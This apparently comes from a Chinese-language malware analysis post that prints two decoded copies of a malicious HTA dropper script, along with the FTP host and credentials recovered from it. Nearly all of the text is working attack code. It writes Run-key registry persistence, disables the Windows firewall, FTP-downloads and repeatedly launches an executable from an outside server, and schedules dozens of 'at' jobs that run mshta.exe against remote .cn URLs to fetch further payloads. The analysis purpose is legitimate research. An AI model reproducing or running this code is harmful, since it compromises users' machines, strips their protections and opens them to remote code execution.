http://xdwlnbqsdsph5pc8rz81.cn/s_t.php

250662772

http://xdwlnbqsdsph5pc8rz81.cn/s_t.php

HTI程序解释请参考翔子的分析报告http://safelab.spaces.live.com/blog/cns!A6B213403DBD59AF!1316.entry
源代码太长,以附件上传,解开的代码

Root="HKEY_CURRENT_USER";Key="\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\";var RR = new ActiveXObject('WScript.Shell');SValue="c:\\qde.exe";ValueName="Msn";RR.RegWrite(Root+Key+ValueName,SValue,"REG_SZ");ValueName="MsnHost";RR.RegWrite(Root+Key+ValueName,SValue,"REG_SZ");ValueName="MsnLoad";RR.RegWrite(Root+Key+ValueName,SValue,"REG_SZ");ValueName="MsnConvert";RR.RegWrite(Root+Key+ValueName,SValue,"REG_SZ");ValueName="MsnMessendger";RR.RegWrite(Root+Key+ValueName,SValue,"REG_SZ");function runapp(app){new ActiveXObject('WScript.Shell').Run(app,0);}var fso = new ActiveXObject("Scripting.FileSystemObject");var a = fso.CreateTextFile("c:\\UoD.bat", true);a.WriteLine("@echo off");a.WriteLine("netsh firewall set opmode disable");a.WriteLine("ftp -s:c:\\vvC6.txt ###ftp_dom");a.WriteLine("start c:\\qde.exe");a.WriteLine("start c:\\qde.exe");a.WriteLine("start c:\\qde.exe");a.WriteLine("start c:\\qde.exe");a.WriteLine("start c:\\qde.exe");a.WriteLine("start c:\\qde.exe");a.WriteLine("start c:\\qde.exe");a.WriteLine("start c:\\qde.exe");a.WriteLine("exit");a.Close();var fso = new ActiveXObject("Scripting.FileSystemObject");var a = fso.CreateTextFile("c:\\vvC6.txt", true);a.WriteLine("qqq");a.WriteLine("123456");a.WriteLine("bin");a.WriteLine("get calc.exe c:\\qde.exe");a.WriteLine("bye");a.Close();runapp('c:\\UoD.bat');var fso = new ActiveXObject("Scripting.FileSystemObject");var a = fso.CreateTextFile("c:\\yM5Hp7k.bat", true);a.WriteLine("@echo off");a.WriteLine("sc config Schedule start= auto");a.WriteLine("net start Schedule");a.WriteLine("at /delete /yes");a.WriteLine("at 00:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 00:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 00:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 00:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 01:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 01:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 01:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 01:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 02:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 02:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 02:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 02:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 03:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 03:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 03:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 03:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 04:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 04:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 04:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 04:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 05:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 05:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 05:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 05:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 06:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 06:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 06:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 06:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 07:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 07:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 07:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 07:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 08:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 08:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 08:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 08:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 09:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 09:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 09:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 09:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 10:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 10:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 10:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 10:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 11:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 11:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 11:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 11:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 12:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 12:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 12:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 12:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 13:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 13:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 13:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 13:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 14:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 14:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 14:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 14:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 15:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 15:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 15:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 15:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 16:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 16:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 16:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 16:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 17:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 17:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 17:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 17:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 18:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 18:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 18:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 18:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 19:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 19:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 19:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 19:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 20:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 20:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 20:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 20:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 21:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 21:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 21:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 21:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 22:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 22:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 22:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 22:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 23:02 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 23:27 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 23:30 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("at 23:48 /every:M,T,W,Th,F,S,Su mshta.exe http://ukxvgbnmzp.cn/33t.php");a.WriteLine("exit");a.Close();runapp('c:\\yM5Hp7k.bat');window.close();

250662772

http://ukxvgbnmzp.cn/33t.php解密内容

Root="HKEY_CURRENT_USER";Key="\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\";var RR = new ActiveXObject('WScript.Shell');SValue="c:\\UUa7Gtju.exe";ValueName="Msn";RR.RegWrite(Root+Key+ValueName,SValue,"REG_SZ");ValueName="MsnHost";RR.RegWrite(Root+Key+ValueName,SValue,"REG_SZ");ValueName="MsnLoad";RR.RegWrite(Root+Key+ValueName,SValue,"REG_SZ");ValueName="MsnConvert";RR.RegWrite(Root+Key+ValueName,SValue,"REG_SZ");ValueName="MsnMessendger";RR.RegWrite(Root+Key+ValueName,SValue,"REG_SZ");function runapp(app){new ActiveXObject('WScript.Shell').Run(app,0);}var fso = new ActiveXObject("Scripting.FileSystemObject");var a = fso.CreateTextFile("c:\\cmhOBE.bat", true);a.WriteLine("@echo off");a.WriteLine("netsh firewall set opmode disable");a.WriteLine("ftp -s:c:\\xaWjNIQg.txt zaebalisuki.com");a.WriteLine("start c:\\UUa7Gtju.exe");a.WriteLine("start c:\\UUa7Gtju.exe");a.WriteLine("start c:\\UUa7Gtju.exe");a.WriteLine("start c:\\UUa7Gtju.exe");a.WriteLine("start c:\\UUa7Gtju.exe");a.WriteLine("start c:\\UUa7Gtju.exe");a.WriteLine("start c:\\UUa7Gtju.exe");a.WriteLine("start c:\\UUa7Gtju.exe");a.WriteLine("exit");a.Close();var fso = new ActiveXObject("Scripting.FileSystemObject");var a = fso.CreateTextFile("c:\\xaWjNIQg.txt", true);a.WriteLine("qqq");a.WriteLine("123456");a.WriteLine("bin");a.WriteLine("get calc.exe c:\\UUa7Gtju.exe");a.WriteLine("bye");a.Close();runapp('c:\\cmhOBE.bat');var fso = new ActiveXObject("Scripting.FileSystemObject");var a = fso.CreateTextFile("c:\\E7q.bat", true);a.WriteLine("@echo off");a.WriteLine("sc config Schedule start= auto");a.WriteLine("net start Schedule");a.WriteLine("at /delete /yes");a.WriteLine("at 00:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 00:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 00:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 00:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 01:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 01:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 01:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 01:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 02:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 02:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 02:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 02:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 03:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 03:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 03:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 03:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 04:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 04:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 04:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 04:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 05:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 05:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 05:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 05:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 06:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 06:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 06:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 06:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 07:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 07:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 07:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 07:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 08:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 08:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 08:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 08:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 09:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 09:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 09:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 09:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 10:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 10:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 10:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 10:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 11:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 11:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 11:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 11:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 12:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 12:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 12:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 12:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 13:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 13:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 13:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 13:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 14:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 14:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 14:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 14:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 15:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 15:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 15:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 15:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 16:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 16:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 16:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 16:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 17:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 17:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 17:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 17:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 18:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 18:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 18:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 18:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 19:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 19:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 19:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 19:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 20:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 20:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 20:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 20:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 21:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 21:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 21:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 21:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 22:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 22:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 22:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 22:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 23:08 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 23:25 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 23:43 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("at 23:46 /every:M,T,W,Th,F,S,Su mshta.exe http://woqyymmptn.cn/33t.php");a.WriteLine("exit");a.Close();runapp('c:\\E7q.bat');window.close();

通过上面代码得到ftp://zaebalisuki.com/用户名qqq密码123456,